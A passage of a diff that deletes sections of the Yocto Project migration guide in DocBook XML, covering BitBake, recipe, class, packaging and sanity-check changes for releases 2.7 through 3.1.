- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- variable.
- </para></listitem>
- <listitem><para>
- The <filename>scripts/contrib/mkefidisk.sh</filename>
- has been removed in favor of Wic.
- </para></listitem>
- <listitem><para>
- <filename>kernel-modules</filename> has been removed from
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- for <filename>qemumips</filename> and
- <filename>qemumips64</filename> machines.
- Removal also impacts the <filename>x86-base.inc</filename>
- file.
- <note>
- <filename>genericx86</filename> and
- <filename>genericx86-64</filename> retain
- <filename>kernel-modules</filename> as part of the
- <filename>RRECOMMENDS</filename> variable setting.
- </note>
- </para></listitem>
- <listitem><para>
- The <filename>LGPLv2_WHITELIST_GPL-3.0</filename>
- variable has been removed.
- If you are setting this variable in your configuration,
- set or append it to the
- <filename>WHITELIST_GPL-3.0</filename> variable instead.
- </para></listitem>
- <listitem><para>
- <filename>${ASNEEDED}</filename> is now included in
- the
- <link linkend='var-TARGET_LDFLAGS'><filename>TARGET_LDFLAGS</filename></link>
- variable directly.
- The remaining definitions from
- <filename>meta/conf/distro/include/as-needed.inc</filename>
- have been moved to corresponding recipes.
- </para></listitem>
- <listitem><para>
- Support for DSA host keys has been dropped from the
- OpenSSH recipes.
- If you are still using DSA keys, you must switch over to a
- more secure algorithm as recommended by OpenSSH upstream.
- </para></listitem>
- <listitem><para>
- The <filename>dhcp</filename> recipe now uses the
- <filename>dhcpd6.conf</filename> configuration file in
- <filename>dhcpd6.service</filename> for IPv6 DHCP rather
- than re-using <filename>dhcpd.conf</filename>, which is
- now reserved for IPv4.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.7-release'>
- <title>Moving to the Yocto Project 2.7 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.7 Release from the prior release.
- </para>
-
- <section id='migration-2.7-bitbake-changes'>
- <title>BitBake Changes</title>
-
- <para>
- The following changes have been made to BitBake:
- <itemizedlist>
- <listitem><para>
- BitBake now checks anonymous Python functions and pure
- Python functions (e.g. <filename>def funcname:</filename>)
- in the metadata for tab indentation.
- If found, BitBake produces a warning.
- </para></listitem>
- <listitem><para>
- Bitbake now checks
- <link linkend='var-BBFILE_COLLECTIONS'><filename>BBFILE_COLLECTIONS</filename></link>
- for duplicate entries and triggers an error if any are
- found.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.7-eclipse-support-dropped'>
- <title><trademark class='trade'>Eclipse</trademark> Support Removed</title>
-
- <para>
- Support for the Eclipse IDE has been removed.
- Support continues for those releases prior to 2.7 that did include
- support.
- The 2.7 release does not include the Eclipse Yocto plugin.
- </para>
- </section>
-
- <section id='migration-2.7-qemu-native-splits-system-and-user-mode-parts'>
- <title><filename>qemu-native</filename> Splits the System and User-Mode Parts</title>
-
- <para>
- The system and user-mode parts of <filename>qemu-native</filename>
- are now split.
- <filename>qemu-native</filename> provides the user-mode components
- and <filename>qemu-system-native</filename> provides the system
- components.
- If you have recipes that depend on QEMU's system emulation
- functionality at build time, they should now depend upon
- <filename>qemu-system-native</filename> instead of
- <filename>qemu-native</filename>.
- </para>
- </section>
-
- <section id='migration-2.7-upstream-tracking.inc-removed'>
- <title>The <filename>upstream-tracking.inc</filename> File Has Been Removed</title>
-
- <para>
- The previously deprecated <filename>upstream-tracking.inc</filename>
- file is now removed.
- Any <filename>UPSTREAM_TRACKING*</filename> variables are now set
- in the corresponding recipes instead.
- </para>
-
- <para>
- Remove any references you have to the
- <filename>upstream-tracking.inc</filename> file in your
- configuration.
- </para>
- </section>
-
- <section id='migration-2.7-distro-features-libc-removed'>
- <title>The <filename>DISTRO_FEATURES_LIBC</filename> Variable Has Been Removed</title>
-
- <para>
- The <filename>DISTRO_FEATURES_LIBC</filename> variable is no
- longer used.
- The ability to configure glibc using kconfig has been removed
- for quite some time making the <filename>libc-*</filename> features
- set no longer effective.
- </para>
-
- <para>
- Remove any references you have to
- <filename>DISTRO_FEATURES_LIBC</filename> in your own layers.
- </para>
- </section>
-
- <section id='migration-2.7-license-values'>
- <title>License Value Corrections</title>
-
- <para>
- The following corrections have been made to the
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- values set by recipes:
- <literallayout class='monospaced'>
- <emphasis>socat</emphasis>: Corrected <filename>LICENSE</filename> to be "GPLv2" rather than
- "GPLv2+".
-
- <emphasis>libgfortran</emphasis>: Set license to "GPL-3.0-with-GCC-exception".
-
- <emphasis>elfutils</emphasis>: Removed "Elfutils-Exception" and set to "GPLv2" for shared
- libraries
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.7-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- This section provides information about packaging changes.
- <itemizedlist>
- <listitem><para>
- <filename>bind</filename>: The
- <filename>nsupdate</filename> binary has been moved to
- the <filename>bind-utils</filename> package.
- </para></listitem>
- <listitem><para>
- Debug split: The default debug split has been changed to
- create separate source packages (i.e.
- <replaceable>package_name</replaceable><filename>-dbg</filename>
- and
- <replaceable>package_name</replaceable><filename>-src</filename>).
- If you are currently using <filename>dbg-pkgs</filename>
- in
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- to bring in debug symbols and you still need the sources,
- you must now also add <filename>src-pkgs</filename> to
- <filename>IMAGE_FEATURES</filename>.
- Source packages remain in the target portion of the SDK
- by default, unless you have set your own value for
- <link linkend='var-SDKIMAGE_FEATURES'><filename>SDKIMAGE_FEATURES</filename></link>
- that does not include <filename>src-pkgs</filename>.
- </para></listitem>
- <listitem><para>
- Mount all using <filename>util-linux</filename>:
- <filename>/etc/default/mountall</filename> has
- moved into the -mount sub-package.
- </para></listitem>
- <listitem><para>
- Splitting binaries using <filename>util-linux</filename>:
- <filename>util-linux</filename> now splits each binary into
- its own package for fine-grained control.
- The main <filename>util-linux</filename> package pulls in
- the individual binary packages using the
- <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
- and
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- variables.
- As a result, existing images should not see any changes
- assuming
- <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>
- is not set.
- </para></listitem>
- <listitem><para>
- <filename>netbase/base-files</filename>:
- <filename>/etc/hosts</filename> has moved from
- <filename>netbase</filename> to
- <filename>base-files</filename>.
- </para></listitem>
- <listitem><para>
- <filename>tzdata</filename>: The main package has been
- converted to an empty meta package that pulls in all
- <filename>tzdata</filename> packages by default.
- </para></listitem>
- <listitem><para>
- <filename>lrzsz</filename>: This package has been removed
- from <filename>packagegroup-self-hosted</filename> and
- <filename>packagegroup-core-tools-testapps</filename>.
- The X/Y/ZModem support is less likely to be needed on
- modern systems.
- If you are relying on these packagegroups to include the
- <filename>lrzsz</filename> package in your image, you
- now need to explicitly add the package.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.7-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <literallayout class='monospaced'>
- <emphasis>gcc</emphasis>: Drop version 7.3 recipes. Version 8.3 now remains.
-
- <emphasis>linux-yocto</emphasis>: Drop versions 4.14 and 4.18 recipes. Versions 4.19 and 5.0 remain.
-
- <emphasis>go</emphasis>: Drop version 1.9 recipes. Versions 1.11 and 1.12 remain.
-
- <emphasis>xvideo-tests</emphasis>: Became obsolete.
-
- <emphasis>libart-lgpl</emphasis>: Became obsolete.
-
- <emphasis>gtk-icon-utils-native</emphasis>: These tools are now provided by gtk+3-native
-
- <emphasis>gcc-cross-initial</emphasis>: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
-
- <emphasis>gcc-crosssdk-initial</emphasis>: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
-
- <emphasis>glibc-initial</emphasis>: Removed because the benefits of having it for site_config are
- currently outweighed by the cost of building the recipe.
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.7-removed-classes'>
- <title>Removed Classes</title>
-
- <para>
- The following classes have been removed:
- <literallayout class='monospaced'>
- <emphasis>distutils-tools</emphasis>: This class was never used.
-
- <emphasis>bugzilla.bbclass</emphasis>: Became obsolete.
-
- <emphasis>distrodata</emphasis>: This functionally has been replaced by a more modern
- tinfoil-based implementation.
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.7-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous changes occurred:
- <itemizedlist>
- <listitem><para>
- The <filename>distro</filename> subdirectory of the Poky
- repository has been removed from the top-level
- <filename>scripts</filename> directory.
- </para></listitem>
- <listitem><para>
- Perl now builds for the target using
- <ulink url='http://arsv.github.io/perl-cross/'><filename>perl-cross</filename></ulink>
- for better maintainability and improved build performance.
- This change should not present any problems unless you have
- heavily customized your Perl recipe.
- </para></listitem>
- <listitem><para>
- <filename>arm-tunes</filename>: Removed the "-march"
- option if mcpu is already added.
- </para></listitem>
- <listitem><para>
- <filename>update-alternatives</filename>: Convert file
- renames to
- <link linkend='var-PACKAGE_PREPROCESS_FUNCS'><filename>PACKAGE_PREPROCESS_FUNCS</filename></link>
- </para></listitem>
- <listitem><para>
- <filename>base/pixbufcache</filename>: Obsolete
- <filename>sstatecompletions</filename> code has been
- removed.
- </para></listitem>
- <listitem><para>
- <link linkend='ref-classes-native'><filename>native</filename></link>
- class:
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- handling has been enabled.
- </para></listitem>
- <listitem><para>
- <filename>inetutils</filename>: This recipe has rsh
- disabled.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-3.0-release'>
- <title>Moving to the Yocto Project 3.0 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 3.0 Release from the prior release.
- </para>
-
- <section id='migration-3.0-init-system-selection'>
- <title>Init System Selection</title>
-
- <para>
- Changing the init system manager previously required setting a
- number of different variables.
- You can now change the manager by setting the
- <filename>INIT_MANAGER</filename> variable and the corresponding
- include files
- (i.e. <filename>conf/distro/include/init-manager-*.conf</filename>).
- Include files are provided for four values: "none", "sysvinit",
- "systemd", and "mdev-busybox".
- The default value, "none", for <filename>INIT_MANAGER</filename>
- should allow your current settings to continue working.
- However, it is advisable to explicitly set
- <filename>INIT_MANAGER</filename>.
- </para>
- </section>
-
- <section id='migration-3.0-lsb-support-removed'>
- <title>LSB Support Removed</title>
-
- <para>
- Linux Standard Base (LSB) as a standard is not current, and
- is not well suited for embedded applications.
- Support can be continued in a separate layer if needed.
- However, presently LSB support has been removed from the core.
- </para>
-
- <para>
- As a result of this change, the <filename>poky-lsb</filename>
- derivative distribution configuration that was also used for
- testing alternative configurations has been replaced with a
- <filename>poky-altcfg</filename> distribution that has LSB
- parts removed.
- </para>
- </section>
-
- <section id='migration-3.0-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed.
- <itemizedlist>
- <listitem><para>
- <filename>core-image-lsb-dev</filename>: Part of removed
- LSB support.
- </para></listitem>
- <listitem><para>
- <filename>core-image-lsb</filename>: Part of removed
- LSB support.
- </para></listitem>
- <listitem><para>
- <filename>core-image-lsb-sdk</filename>: Part of removed
- LSB support.
- </para></listitem>
- <listitem><para>
- <filename>cve-check-tool</filename>: Functionally replaced
- by the <filename>cve-update-db</filename> recipe and
- <filename>cve-check</filename> class.
- </para></listitem>
- <listitem><para>
- <filename>eglinfo</filename>: No longer maintained.
- <filename>eglinfo</filename> from
- <filename>mesa-demos</filename> is an adequate and
- maintained alternative.
- </para></listitem>
- <listitem><para>
- <filename>gcc-8.3</filename>: Version 8.3 removed.
- Replaced by 9.2.
- </para></listitem>
- <listitem><para>
- <filename>gnome-themes-standard</filename>: Only needed
- by gtk+ 2.x, which has been removed.
- </para></listitem>
- <listitem><para>
- <filename>gtk+</filename>: GTK+ 2 is obsolete and has been
- replaced by gtk+3.
- </para></listitem>
- <listitem><para>
- <filename>irda-utils</filename>: Has become obsolete.
- IrDA support has been removed from the Linux kernel in
- version 4.17 and later.
- </para></listitem>
- <listitem><para>
- <filename>libnewt-python</filename>:
- <filename>libnewt</filename> Python support merged into
- main <filename>libnewt</filename> recipe.
- </para></listitem>
- <listitem><para>
- <filename>libsdl</filename>: Replaced by newer
- <filename>libsdl2</filename>.
- </para></listitem>
- <listitem><para>
- <filename>libx11-diet</filename>: Became obsolete.
- </para></listitem>
- <listitem><para>
- <filename>libxx86dga</filename>: Removed obsolete client
- library.
- </para></listitem>
- <listitem><para>
- <filename>libxx86misc</filename>: Removed. Library is
- redundant.
- </para></listitem>
- <listitem><para>
- <filename>linux-yocto</filename>: Version 5.0 removed,
- which is now redundant (5.2 / 4.19 present).
- </para></listitem>
- <listitem><para>
- <filename>lsbinitscripts</filename>: Part of removed LSB
- support.
- </para></listitem>
- <listitem><para>
- <filename>lsb</filename>: Part of removed LSB support.
- </para></listitem>
- <listitem><para>
- <filename>lsbtest</filename>: Part of removed LSB support.
- </para></listitem>
- <listitem><para>
- <filename>openssl10</filename>: Replaced by newer
- <filename>openssl</filename> version 1.1.
- </para></listitem>
- <listitem><para>
- <filename>packagegroup-core-lsb</filename>: Part of removed
- LSB support.
- </para></listitem>
- <listitem><para>
- <filename>python-nose</filename>: Removed the Python 2.x
- version of the recipe.
- </para></listitem>
- <listitem><para>
- <filename>python-numpy</filename>: Removed the Python 2.x
- version of the recipe.
- </para></listitem>
- <listitem><para>
- <filename>python-scons</filename>: Removed the Python 2.x
- version of the recipe.
- </para></listitem>
- <listitem><para>
- <filename>source-highlight</filename>: No longer needed.
- </para></listitem>
- <listitem><para>
- <filename>stress</filename>: Replaced by
- <filename>stress-ng</filename>.
- </para></listitem>
- <listitem><para>
- <filename>vulkan</filename>: Split into
- <filename>vulkan-loader</filename>,
- <filename>vulkan-headers</filename>, and
- <filename>vulkan-tools</filename>.
- </para></listitem>
- <listitem><para>
- <filename>weston-conf</filename>: Functionality moved to
- <filename>weston-init</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.0-packaging-changes'>
- <title>Packaging Changes</title>
-
- <para>
- The following packaging changes have occurred.
- <itemizedlist>
- <listitem><para>
- The
- <ulink url='https://en.wikipedia.org/wiki/GNOME_Web'>Epiphany</ulink>
- browser has been dropped from
- <filename>packagegroup-self-hosted</filename> as it has
- not been needed inside
- <filename>build-appliance-image</filename> for
- quite some time and was causing resource problems.
- </para></listitem>
- <listitem><para>
- <filename>libcap-ng</filename> Python support has been
- moved to a separate <filename>libcap-ng-python</filename>
- recipe to streamline the build process when the Python
- bindings are not needed.
- </para></listitem>
- <listitem><para>
- <filename>libdrm</filename> now packages the file
- <filename>amdgpu.ids</filename> into a separate
- <filename>libdrm-amdgpu</filename> package.
- </para></listitem>
- <listitem><para>
- <filename>python3</filename>: The
- <filename>runpy</filename> module is now in the
- <filename>python3-core</filename> package as it is
- required to support the common "python3 -m" command usage.
- </para></listitem>
- <listitem><para>
- <filename>distcc</filename> now provides separate
- <filename>distcc-client</filename> and
- <filename>distcc-server</filename> packages as typically
- one or the other are needed, rather than both.
- </para></listitem>
- <listitem><para>
- <filename>python*-setuptools</filename> recipes now
- separately package the <filename>pkg_resources</filename>
- module in a <filename>python-pkg-resources</filename> /
- <filename>python3-pkg-resources</filename> package as
- the module is useful independent of the rest of the
- setuptools package.
- The main <filename>python-setuptools</filename> /
- <filename>python3-setuptools</filename> package depends
- on this new package so you should only need to update
- dependencies unless you want to take advantage of the
- increased granularity.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.0-cve-checking'>
- <title>CVE Checking</title>
-
- <para>
- <filename>cve-check-tool</filename> has been functionally replaced
- by a new <filename>cve-update-db</filename> recipe and
- functionality built into the <filename>cve-check</filename> class.
- The result uses NVD JSON data feeds rather than the deprecated
- XML feeds that <filename>cve-check-tool</filename> was using,
- supports CVSSv3 scoring, and makes other improvements.
- </para>
-
- <para>
- Additionally, the <filename>CVE_CHECK_CVE_WHITELIST</filename>
- variable has been replaced by
- <filename>CVE_CHECK_WHITELIST</filename>.
- </para>
- </section>
-
- <section id='migration-3.0-bitbake-changes'>
- <title>Bitbake Changes</title>
-
- <para>
- The following BitBake changes have occurred.
- <itemizedlist>
- <listitem><para>
- <filename>addtask</filename> statements now properly
- validate dependent tasks.
- Previously, an invalid task was silently ignored.
- With this change, the invalid task generates a warning.
- </para></listitem>
- <listitem><para>
- Other invalid <filename>addtask</filename> and
- <filename>deltask</filename> usages now trigger these
- warnings: "multiple target tasks arguments with
- addtask / deltask", and "multiple before/after clauses".
- </para></listitem>
- <listitem><para>
- The "multiconfig" prefix is now shortened to "mc".
- "multiconfig" will continue to work, however it may be
- removed in a future release.
- </para></listitem>
- <listitem><para>
- The <filename>bitbake -g</filename> command no longer
- generates a <filename>recipe-depends.dot</filename> file
- as the contents (i.e. a reprocessed version of
- <filename>task-depends.dot</filename>) were confusing.
- </para></listitem>
- <listitem><para>
- The <filename>bb.build.FuncFailed</filename> exception,
- previously raised by
- <filename>bb.build.exec_func()</filename> when certain
- other exceptions have occurred, has been removed.
- The real underlying exceptions will be raised instead.
- If you have calls to
- <filename>bb.build.exec_func()</filename> in custom classes
- or <filename>tinfoil-using</filename> scripts, any
- references to <filename>bb.build.FuncFailed</filename>
- should be cleaned up.
- </para></listitem>
- <listitem><para>
- Additionally, the
- <filename>bb.build.exec_func()</filename> no longer accepts
- the "pythonexception" parameter.
- The function now always raises exceptions.
- Remove this argument in any calls to
- <filename>bb.build.exec_func()</filename> in custom classes
- or scripts.
- </para></listitem>
- <listitem><para>
- The
- <ulink url='&YOCTO_DOCS_BB_URL;#var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><filename>BB_SETSCENE_VERIFY_FUNCTION2</filename></ulink>
- is no longer used.
- In the unlikely event that you have any references to it,
- they should be removed.
- </para></listitem>
- <listitem><para>
- The <filename>RunQueueExecuteScenequeue</filename> and
- <filename>RunQueueExecuteTasks</filename> events have been
- removed since setscene tasks are now executed as part of
- the normal runqueue.
- Any event handling code in custom classes or scripts that
- handles these two events need to be updated.
- </para></listitem>
- <listitem><para>
- The arguments passed to functions used with
- <ulink url='&YOCTO_DOCS_BB_URL;#var-bb-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></ulink>
- have changed.
- If you are using your own custom hash check function, see
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=40a5e193c4ba45c928fccd899415ea56b5417725'></ulink>
- for details.
- </para></listitem>
- <listitem><para>
- Task specifications in <filename>BB_TASKDEPDATA</filename>
- and class implementations used in signature generator
- classes now use "&lt;fn&gt;:&lt;task&gt;" everywhere rather than
- the "." delimiter that was being used in some places.
- This change makes it consistent with all areas in the code.
- Custom signature generator classes and code that reads
- <filename>BB_TASKDEPDATA</filename> need to be updated to
- use ':' as a separator rather than '.'.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.0-sanity-checks'>
- <title>Sanity Checks</title>
-
- <para>
- The following sanity check changes occurred.
- <itemizedlist>
- <listitem><para>
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- is now checked for usage of two problematic items:
- <itemizedlist>
- <listitem><para>
- "${PN}" prefix/suffix use - Warnings always appear
- if ${PN} is used.
- You must fix the issue regardless of whether
- multiconfig or anything else that would cause
- prefixing/suffixing to happen.
- </para></listitem>
- <listitem><para>
- Github archive tarballs - these are not guaranteed
- to be stable.
- Consequently, it is likely that the tarballs will
- be refreshed and thus the SRC_URI checksums
- will fail to apply.
- It is recommended that you fetch either an official
- release tarball or a specific revision from the
- actual Git repository instead.
- </para></listitem>
- </itemizedlist>
- Either one of these items now trigger a warning by default.
- If you wish to disable this check, remove
- <filename>src-uri-bad</filename> from
- <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link>.
- </para></listitem>
- <listitem><para>
- The <filename>file-rdeps</filename> runtime dependency
- check no longer expands
- <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
- recursively as there is no mechanism to ensure they can be
- fully computed, and thus races sometimes result in errors
- either showing up or not.
- Thus, you might now see errors for missing runtime
- dependencies that were previously satisfied recursively.
- Here is an example: package A contains a shell script
- starting with <filename>#!/bin/bash</filename> but has no
- dependency on bash.
- However, package A depends on package B, which does depend
- on bash.
- You need to add the missing dependency or dependencies to
- resolve the warning.
- </para></listitem>
- <listitem><para>
- Setting <filename>DEPENDS_${PN}</filename> anywhere
- (i.e. typically in a recipe) now triggers an error.
- The error is triggered because
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- is not a package-specific variable unlike RDEPENDS.
- You should set <filename>DEPENDS</filename> instead.
- </para></listitem>
- <listitem><para>
- systemd currently does not work well with the musl C
- library because only upstream officially supports linking
- the library with glibc.
- Thus, a warning is shown when building systemd in
- conjunction with musl.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.0-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous changes have occurred.
- <itemizedlist>
- <listitem><para>
- The <filename>gnome</filename>
- class has been removed because it now does very little.
- You should update recipes that previously inherited this
- class to do the following:
- <literallayout class='monospaced'>
- inherit gnomebase gtk-icon-cache gconf mime
- </literallayout>
- </para></listitem>
- <listitem><para>
- The
- <filename>meta/recipes-kernel/linux/linux-dtb.inc</filename>
- file has been removed.
- This file was previously deprecated in favor of setting
- <link linkend='var-KERNEL_DEVICETREE'><filename>KERNEL_DEVICETREE</filename></link>
- in any kernel recipe and only produced a warning.
- Remove any <filename>include</filename> or
- <filename>require</filename> statements pointing to this
- file.
- </para></listitem>
- <listitem><para>
- <link linkend='var-TARGET_CFLAGS'><filename>TARGET_CFLAGS</filename></link>,
- <link linkend='var-TARGET_CPPFLAGS'><filename>TARGET_CPPFLAGS</filename></link>,
- <link linkend='var-TARGET_CXXFLAGS'><filename>TARGET_CXXFLAGS</filename></link>,
- and
- <link linkend='var-TARGET_LDFLAGS'><filename>TARGET_LDFLAGS</filename></link>
- are no longer exported to the external environment.
- This change did not require any changes to core recipes,
- which is a good indicator that no changes will be
- required.
- However, if for some reason the software being built by one
- of your recipes is expecting these variables to be set,
- then building the recipe will fail.
- In such cases, you must either export the variable or
- variables in the recipe or change the scripts so that
- exporting is not necessary.
- </para></listitem>
- <listitem><para>
- You must change the host distro identifier used in
- <link linkend='var-NATIVELSBSTRING'><filename>NATIVELSBSTRING</filename></link>
- to use all lowercase characters even if it does not contain
- a version number.
- This change is necessary only if you are not using
- <filename>uninative</filename> and
- <link linkend='var-SANITY_TESTED_DISTROS'><filename>SANITY_TESTED_DISTROS</filename></link>.
- </para></listitem>
- <listitem><para>
- In the <filename>base-files</filename> recipe, writing the
- hostname into <filename>/etc/hosts</filename> and
- <filename>/etc/hostname</filename> is now done within the
- main
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- function rather than in the
- <filename>do_install_basefilesissue</filename> function.
- The reason for the change is because
- <filename>do_install_basefilesissue</filename> is more
- easily overridden without having to duplicate the hostname
- functionality.
- If you have done the latter (e.g. in a
- <filename>base-files</filename> bbappend), then you should
- remove it from your customized
- <filename>do_install_basefilesissue</filename> function.
- </para></listitem>
- <listitem><para>
- The <filename>wic --expand</filename> command now uses
- commas to separate "key:value" pairs rather than hyphens.
- <note>
- The wic command-line help is not updated.
- </note>
- You must update any scripts or commands where you use
- <filename>wic --expand</filename> with multiple
- "key:value" pairs.
- </para></listitem>
- <listitem><para>
- UEFI image variable settings have been moved from various
- places to a central
- <filename>conf/image-uefi.conf</filename>.
- This change should not influence any existing configuration
- as the <filename>meta/conf/image-uefi.conf</filename>
- in the core metadata sets defaults that can be overridden
- in the same manner as before.
- </para></listitem>
- <listitem><para>
- <filename>conf/distro/include/world-broken.inc</filename>
- has been removed.
- For cases where certain recipes need to be disabled when
- using the musl C library, these recipes now have
- <filename>COMPATIBLE_HOST_libc-musl</filename> set with a
- comment that explains why.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-
-<section id='moving-to-the-yocto-project-3.1-release'>
- <title>Moving to the Yocto Project 3.1 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 3.1 Release from the prior release.
- </para>
-
- <section id='migration-3.1-minimum-system-requirements'>
- <title>Minimum system requirements</title>
-
- <para>
- The following versions / requirements of build host components have been updated:
- <itemizedlist>
- <listitem><para>gcc 5.0</para></listitem>
- <listitem><para>python 3.5</para></listitem>
- <listitem><para>tar 1.28</para></listitem>
- <listitem><para><filename>rpcgen</filename> is now required on the host (part of the <filename>libc-dev-bin</filename> package on Ubuntu, Debian and related distributions, and the <filename>glibc</filename> package on RPM-based distributions).</para></listitem>
- </itemizedlist>
-
- Additionally, the <filename>makeinfo</filename> and <filename>pod2man</filename>
- tools are <emphasis>no longer</emphasis> required on the host.
- </para>
- </section>
-
- <section id='migration-3.1-mpc8315e-rdb-removed'>
- <title>mpc8315e-rdb machine removed</title>
-
- <para>
- The MPC8315E-RDB machine is old/obsolete and unobtainable, thus given the maintenance burden
- the <filename>mpc8315e-rdb</filename> machine configuration that supported it has been removed
- in this release. The removal does leave a gap in official PowerPC reference hardware
- support; this may change in future if a suitable machine with accompanying support resources
- is found.
- </para>
- </section>
-
- <section id='migration-3.1-python-2-removed'>
- <title>Python 2 removed</title>
-
- <para>
- Due to the expiration of upstream support in January 2020, support for Python 2 has now been removed; it is recommended that you use Python 3 instead. If absolutely needed there is a meta-python2 community layer containing Python 2, related classes and various Python 2-based modules, however it should not be considered as supported.
- </para>
- </section>
-
- <section id='migration-3.1-reproducible-builds'>
- <title>Reproducible builds now enabled by default</title>
-
- <para>
- In order to avoid unnecessary differences in output files (aiding binary reproducibility), the Poky distribution configuration (<filename><link linkend='var-DISTRO'>DISTRO</link> = "poky"</filename>) now inherits the <filename>reproducible_build</filename> class by default.
- </para>
- </section>
-
- <section id='migration-3.1-ptest-feature-impact'>
- <title>Impact of ptest feature is now more significant</title>
-
- <para>
- The Poky distribution configuration (<filename><link linkend='var-DISTRO'>DISTRO</link> = "poky"</filename>) enables ptests by default to enable runtime testing of various components. In this release, a dependency needed to be added that has resulted in a significant increase in the number of components that will be built just when building a simple image such as core-image-minimal. If you do not need runtime tests enabled for core components, then it is recommended that you remove "ptest" from <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link> to save a significant amount of build time e.g. by adding the following in your configuration:
-
- <literallayout class='monospaced'>
- DISTRO_FEATURES_remove = "ptest"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-3.1-removed-recipes'>
- <title>Removed recipes</title>
-
- <para>
- The following recipes have been removed:
-
- <itemizedlist>
- <listitem><para><filename>chkconfig</filename>: obsolete</para></listitem>
- <listitem><para><filename>console-tools</filename>: obsolete</para></listitem>
- <listitem><para><filename>enchant</filename>: replaced by <filename>enchant2</filename></para></listitem>
- <listitem><para><filename>foomatic-filters</filename>: obsolete</para></listitem>
- <listitem><para><filename>libidn</filename>: no longer needed, moved to meta-oe</para></listitem>
- <listitem><para><filename>libmodulemd</filename>: replaced by <filename>libmodulemd-v1</filename></para></listitem>
- <listitem><para><filename>linux-yocto</filename>: drop 4.19, 5.2 version recipes (5.4 now provided)</para></listitem>
- <listitem><para><filename>nspr</filename>: no longer needed, moved to meta-oe</para></listitem>
- <listitem><para><filename>nss</filename>: no longer needed, moved to meta-oe</para></listitem>
- <listitem><para><filename>python</filename>: Python 2 removed (Python 3 preferred)</para></listitem>
- <listitem><para><filename>python-setuptools</filename>: Python 2 version removed (python3-setuptools preferred)</para></listitem>
- <listitem><para><filename>sysprof</filename>: no longer needed, moved to meta-oe</para></listitem>
- <listitem><para><filename>texi2html</filename>: obsolete</para></listitem>
- <listitem><para><filename>u-boot-fw-utils</filename>: functionally replaced by <filename>libubootenv</filename></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.1-features-check'>
- <title>features_check class replaces distro_features_check</title>
-
- <para>
- The <filename>distro_features_check</filename> class has had its functionality expanded, now supporting <filename>ANY_OF_MACHINE_FEATURES</filename>, <filename>REQUIRED_MACHINE_FEATURES</filename>, <filename>CONFLICT_MACHINE_FEATURES</filename>, <filename>ANY_OF_COMBINED_FEATURES</filename>, <filename>REQUIRED_COMBINED_FEATURES</filename>, <filename>CONFLICT_COMBINED_FEATURES</filename>. As a result the class has now been renamed to <filename>features_check</filename>; the <filename>distro_features_check</filename> class still exists but generates a warning and redirects to the new class. In preparation for a future removal of the old class it is recommended that you update recipes currently inheriting <filename>distro_features_check</filename> to inherit <filename>features_check</filename> instead.
- </para>
- </section>
-
- <section id='migration-3.1-removed-classes'>
- <title>Removed classes</title>
-
- <para>
- The following classes have been removed:
-
- <itemizedlist>
- <listitem><para><filename>distutils-base</filename>: moved to meta-python2</para></listitem>
- <listitem><para><filename>distutils</filename>: moved to meta-python2</para></listitem>
- <listitem><para><filename>libc-common</filename>: merged into the glibc recipe as nothing else used it.</para></listitem>
- <listitem><para><filename>python-dir</filename>: moved to meta-python2</para></listitem>
- <listitem><para><filename>pythonnative</filename>: moved to meta-python2</para></listitem>
- <listitem><para><filename>setuptools</filename>: moved to meta-python2</para></listitem>
- <listitem><para><filename>tinderclient</filename>: dropped as it was obsolete.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-3.1-src-uri-checksums'>
- <title>SRC_URI checksum behaviour</title>
-
- <para>
